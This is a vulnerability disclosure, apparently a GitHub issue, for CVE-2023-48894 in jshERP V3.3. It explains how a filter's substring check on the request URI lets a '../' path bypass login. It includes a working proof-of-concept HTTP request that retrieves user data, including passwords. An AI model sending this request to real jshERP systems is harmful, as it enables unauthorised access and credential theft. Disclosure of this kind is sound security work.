CVE-2023-48894: There is an Incorrect Access Control vulnerability in jshERP V3.3 that lead to the leakage of sensitive information in the backend system · Issue #98 · jishenghua/jshERP

1.The affected source code file is src/main/java/com/jsh/erp/filter/LogCostFilter.java,and the affected function is doFilter.

In the filter code, use servletRequest.getRequestURI() to obtain the request path, and then determine whether the path contains /doc.html, /user/login, /user/register. If so, execute chain.doFilter(request, response) to skip this filter. Else, continue to check.

Then determine whether the path startswith allowUrls. If so, execute chain.doFilter(request, response) to skip this filter.

See the screenshot below for the value of allowUrls

2.The problem lies in using servletRequest.getRequestURI() to obtain the request path. The path obtained by this function will not parse special symbols, but will be passed on directly, so you can use …/ to bypass it. Taking one of the backend interfaces /jshERP-boot/user/getAllList as an example, using /user/login/…/…/jshERP-boot/user/getAllList can make it satisfy requestUrl.contains(“/user/login” ), and at the same time, it can request the getAllList interface to achieve login bypass.

3.The Poc is as follows:

GET /user/login/../../jshERP-boot/user/getAllList HTTP/1.1
Host: 192.168.124.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

When accessing the /jshERP-boot/user/getAllList interface directly, it will return "loginOut".

When accessing the /user/login/…/…/jshERP-boot/user/getAllList interface, the user information can be obtained by bypassing the access control,whice also includes user passwords.